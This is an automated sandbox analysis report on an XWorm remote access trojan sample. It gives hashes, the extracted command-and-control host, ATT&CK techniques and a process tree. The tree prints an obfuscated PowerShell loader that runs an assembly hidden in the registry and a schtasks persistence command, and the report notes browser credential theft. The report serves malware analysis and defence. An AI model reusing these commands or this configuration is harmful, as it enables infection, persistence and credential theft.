xworm | d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000

Analysis

max time kernel
60s
max time network
59s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
12-07-2024 22:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe
Size

761KB
MD5

1b767b2a4f8596b12e1e2306cb3b9939
SHA1

007190828b70f2a72311e603bbb94bcb2e41b1c0
SHA256

d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000
SHA512

cf3bbbfe500fc752eb0d777f44d90d1d245bb5394ada49a26a0ac31d62d331324a2c49f1e14072ec446d5a1acb44e9426868af2898cdfe65effe9092bf1fa6d7
SSDEEP

12288:MSJBQ/xsjApTtnb0TbQxMM90CL7VmADH2eJGCOTJfVXwAfIXZqPtbxZWdezgrrN:MABQ/mjuTt4TbQRjDH2eJQTNqcWOVZK1

Score

10^/10

xworm persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:13576

edition-eat.gl.at.ply.gg:13576

Attributes

Install_directory
%AppData%
install_file
USB.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000a00000001202e-5.dat	family_xworm
behavioral1/memory/1572-10-0x0000000000AE0000-0x0000000000AF8000-memory.dmp	family_xworm

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2160 created 436	2160	powershell.EXE	5

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4svchost.lnk	x444.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4svchost.lnk	x444.exe

Executes dropped EXE 17 IoCs

pid	Process
1572	x444.exe
2040	x4Shellcode.exe
480	services.exe
2056	alg.exe
2740	aspnet_state.exe
2884	mscorsvw.exe
1636	mscorsvw.exe
2440	elevation_service.exe
2772	GROOVE.EXE
2984	maintenanceservice.exe
2456	OSE.EXE
1780	mscorsvw.exe
1292	mscorsvw.exe
2036	mscorsvw.exe
2732	mscorsvw.exe
2364	mscorsvw.exe
2616	mscorsvw.exe

Loads dropped DLL 1 IoCs

pid	Process
480	services.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4svchost = "C:\\Users\\Admin\\AppData\\Roaming\\x4svchost"	x444.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
12	ip-api.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	GROOVE.EXE
File opened for modification	C:\Windows\System32\alg.exe	x4Shellcode.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\4767813e62d4432.bin	alg.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2160 set thread context of 2536	2160	powershell.EXE	45

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleCrashHandler64.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\Install\{82C9E0F7-90DB-4BC5-9338-612926653CF7}\chrome_installer.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jcmd.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaw.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\ktab.exe	alg.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPREARM.EXE	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jvisualvm.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jabswitch.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\private_browsing.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\uninstall\helper.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\template.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jstat.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\airappinstaller.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleCrashHandler.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\java.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javaws.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre7\bin\ktab.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Setup.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateBroker.exe	alg.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Updater6\Adobe_Updater.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE	alg.exe
File opened for modification	C:\Program Files\7-Zip\7z.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javap.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jconsole.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\rmiregistry.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\launcher.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmiregistry.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateOnDemand.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jarsigner.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\tnameserv.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\updater.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\ink\pipanel.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre7\bin\keytool.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdate.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jstatd.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\x86\vsta_ep32.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateSetup.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\ssvagent.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\plugin-container.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE	alg.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\extcheck.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jabswitch.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jar.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\default-browser-agent.exe	alg.exe
File opened for modification	C:\Program Files\Internet Explorer\iediagcmd.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\orbd.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaws.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre7\bin\javaw.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\ink\TabTip32.exe	alg.exe

Drops file in Windows directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe	x4Shellcode.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen_service.log	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenrootstorelock.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenofflinequeuelock.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\ngenservice_pri1_lock.dat	mscorsvw.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe	alg.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat	mscorsvw.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe	alg.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen_service.log	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenservicelock.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\ngennicupdatelock.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenofflinequeuelock.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\ngenservice_pri1_lock.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\ngennicupdatelock.dat	mscorsvw.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 5035e76eaad4da01	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	GROOVE.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2760	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2160	powershell.EXE
2160	powershell.EXE
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe
2536	dllhost.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeDebugPrivilege	1572	x444.exe
Token: SeTakeOwnershipPrivilege	2040	x4Shellcode.exe
Token: SeShutdownPrivilege	1636	mscorsvw.exe
Token: SeShutdownPrivilege	2884	mscorsvw.exe
Token: SeDebugPrivilege	2160	powershell.EXE
Token: SeShutdownPrivilege	1636	mscorsvw.exe
Token: SeShutdownPrivilege	2884	mscorsvw.exe
Token: SeDebugPrivilege	2160	powershell.EXE
Token: SeDebugPrivilege	1572	x444.exe
Token: SeDebugPrivilege	2536	dllhost.exe
Token: SeShutdownPrivilege	1636	mscorsvw.exe
Token: SeShutdownPrivilege	1636	mscorsvw.exe
Token: SeShutdownPrivilege	2884	mscorsvw.exe
Token: SeShutdownPrivilege	2884	mscorsvw.exe
Token: SeShutdownPrivilege	1636	mscorsvw.exe
Token: SeAuditPrivilege	840	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1736 wrote to memory of 1572	1736	d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe	29
PID 1736 wrote to memory of 1572	1736	d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe	29
PID 1736 wrote to memory of 1572	1736	d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe	29
PID 1736 wrote to memory of 2040	1736	d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe	30
PID 1736 wrote to memory of 2040	1736	d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe	30
PID 1736 wrote to memory of 2040	1736	d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe	30
PID 1736 wrote to memory of 2040	1736	d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe	30
PID 2800 wrote to memory of 2160	2800	taskeng.exe	35
PID 2800 wrote to memory of 2160	2800	taskeng.exe	35
PID 2800 wrote to memory of 2160	2800	taskeng.exe	35
PID 1572 wrote to memory of 2760	1572	x444.exe	43
PID 1572 wrote to memory of 2760	1572	x444.exe	43
PID 1572 wrote to memory of 2760	1572	x444.exe	43
PID 2160 wrote to memory of 2536	2160	powershell.EXE	45
PID 2160 wrote to memory of 2536	2160	powershell.EXE	45
PID 2160 wrote to memory of 2536	2160	powershell.EXE	45
PID 2160 wrote to memory of 2536	2160	powershell.EXE	45
PID 2160 wrote to memory of 2536	2160	powershell.EXE	45
PID 2160 wrote to memory of 2536	2160	powershell.EXE	45
PID 2160 wrote to memory of 2536	2160	powershell.EXE	45
PID 2160 wrote to memory of 2536	2160	powershell.EXE	45
PID 2160 wrote to memory of 2536	2160	powershell.EXE	45
PID 2536 wrote to memory of 436	2536	dllhost.exe	5
PID 2536 wrote to memory of 480	2536	dllhost.exe	6
PID 2536 wrote to memory of 496	2536	dllhost.exe	7
PID 1636 wrote to memory of 1780	1636	mscorsvw.exe	46
PID 1636 wrote to memory of 1780	1636	mscorsvw.exe	46
PID 1636 wrote to memory of 1780	1636	mscorsvw.exe	46
PID 2536 wrote to memory of 504	2536	dllhost.exe	8
PID 2536 wrote to memory of 604	2536	dllhost.exe	9
PID 2536 wrote to memory of 680	2536	dllhost.exe	10
PID 2536 wrote to memory of 760	2536	dllhost.exe	11
PID 1636 wrote to memory of 1292	1636	mscorsvw.exe	47
PID 1636 wrote to memory of 1292	1636	mscorsvw.exe	47
PID 1636 wrote to memory of 1292	1636	mscorsvw.exe	47
PID 2536 wrote to memory of 808	2536	dllhost.exe	12
PID 2536 wrote to memory of 840	2536	dllhost.exe	13
PID 2536 wrote to memory of 964	2536	dllhost.exe	14
PID 2536 wrote to memory of 108	2536	dllhost.exe	15
PID 2536 wrote to memory of 664	2536	dllhost.exe	16
PID 2884 wrote to memory of 2036	2884	mscorsvw.exe	48
PID 2884 wrote to memory of 2036	2884	mscorsvw.exe	48
PID 2884 wrote to memory of 2036	2884	mscorsvw.exe	48
PID 2884 wrote to memory of 2036	2884	mscorsvw.exe	48
PID 2536 wrote to memory of 952	2536	dllhost.exe	17
PID 2536 wrote to memory of 1316	2536	dllhost.exe	18
PID 2536 wrote to memory of 1408	2536	dllhost.exe	19
PID 2884 wrote to memory of 2732	2884	mscorsvw.exe	49
PID 2884 wrote to memory of 2732	2884	mscorsvw.exe	49
PID 2884 wrote to memory of 2732	2884	mscorsvw.exe	49
PID 2884 wrote to memory of 2732	2884	mscorsvw.exe	49
PID 2536 wrote to memory of 1440	2536	dllhost.exe	20
PID 2536 wrote to memory of 1432	2536	dllhost.exe	22
PID 2884 wrote to memory of 2364	2884	mscorsvw.exe	50
PID 2884 wrote to memory of 2364	2884	mscorsvw.exe	50
PID 2884 wrote to memory of 2364	2884	mscorsvw.exe	50
PID 2884 wrote to memory of 2364	2884	mscorsvw.exe	50
PID 2536 wrote to memory of 876	2536	dllhost.exe	23
PID 2536 wrote to memory of 1792	2536	dllhost.exe	24
PID 2536 wrote to memory of 1968	2536	dllhost.exe	25
PID 2536 wrote to memory of 1932	2536	dllhost.exe	26
PID 2884 wrote to memory of 2616	2884	mscorsvw.exe	51
PID 2884 wrote to memory of 2616	2884	mscorsvw.exe	51
PID 2884 wrote to memory of 2616	2884	mscorsvw.exe	51

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:436
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{3eba275d-6150-432d-be13-9f5c8273aa98}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2536

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:480
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:604
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:1432
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe
    3⤵
    PID:1792
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    3⤵
    PID:2196
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:680
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  PID:760
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:808
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1408
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:840
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {E8886818-0B73-4062-83E1-15B1A8D1DEED} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2800
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+'W'+[Char](65)+'RE').GetValue(''+[Char](120)+'4'+[Char](115)+''+'t'+''+[Char](97)+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2160
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:964
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:108
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:664
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:952
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1316
- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  2⤵
  PID:876
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:1968
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:1932
- C:\Windows\System32\alg.exe
  C:\Windows\System32\alg.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  PID:2056
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
  2⤵
  - Executes dropped EXE
  PID:2740
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2884
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e4 -InterruptEvent 1d0 -NGENProcess 1d4 -Pipe 1e0 -Comment "NGen Worker Process"
    3⤵
    - Executes dropped EXE
    PID:2036
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1dc -InterruptEvent 248 -NGENProcess 250 -Pipe 254 -Comment "NGen Worker Process"
    3⤵
    - Executes dropped EXE
    PID:2732
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 248 -InterruptEvent 240 -NGENProcess 1ec -Pipe 238 -Comment "NGen Worker Process"
    3⤵
    - Executes dropped EXE
    PID:2364
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 240 -InterruptEvent 244 -NGENProcess 1e4 -Pipe 1d4 -Comment "NGen Worker Process"
    3⤵
    - Executes dropped EXE
    PID:2616
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1636
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1dc -InterruptEvent 1c8 -NGENProcess 1cc -Pipe 1d8 -Comment "NGen Worker Process"
    3⤵
    - Executes dropped EXE
    PID:1780
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1d4 -InterruptEvent 238 -NGENProcess 240 -Pipe 244 -Comment "NGen Worker Process"
    3⤵
    - Executes dropped EXE
    PID:1292
- C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
  2⤵
  - Executes dropped EXE
  PID:2440
- C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE
  "C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE" /auditservice
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2772
- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
  "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
  2⤵
  - Executes dropped EXE
  PID:2984
- C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
  "C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
  2⤵
  - Executes dropped EXE
  PID:2456

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:496

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:504

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1440
- C:\Users\Admin\AppData\Local\Temp\d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe
  "C:\Users\Admin\AppData\Local\Temp\d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1736
- - C:\Users\Admin\AppData\Local\Temp\x444.exe
    "C:\Users\Admin\AppData\Local\Temp\x444.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1572
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x4svchost" /tr "C:\Users\Admin\AppData\Roaming\x4svchost"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2760
- - C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
    "C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken
    PID:2040

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "799119910-756567500476540444183691509712128221451456153475-681431971-791626421"
1⤵
PID:2764

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE

Filesize
706KB

MD5
4034469d5be9fadf71faf5eb4c854c7e

SHA1
d7abb0741413e8f8f3216ce6a06bc3148d0f1ed5

SHA256
1643535ce5973d7082a7d09c1cc34b04fa71d25335a5f9538713d6ae73f120aa

SHA512
c677b0594bd0ba93ae714ae15fde0e7bddb8c1659ec95eb865b1e284370d64c9dabaded84553c9c99e0b563788569291dd2eef1723d3cf1daba6ef46925f208f

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE

Filesize
30.1MB

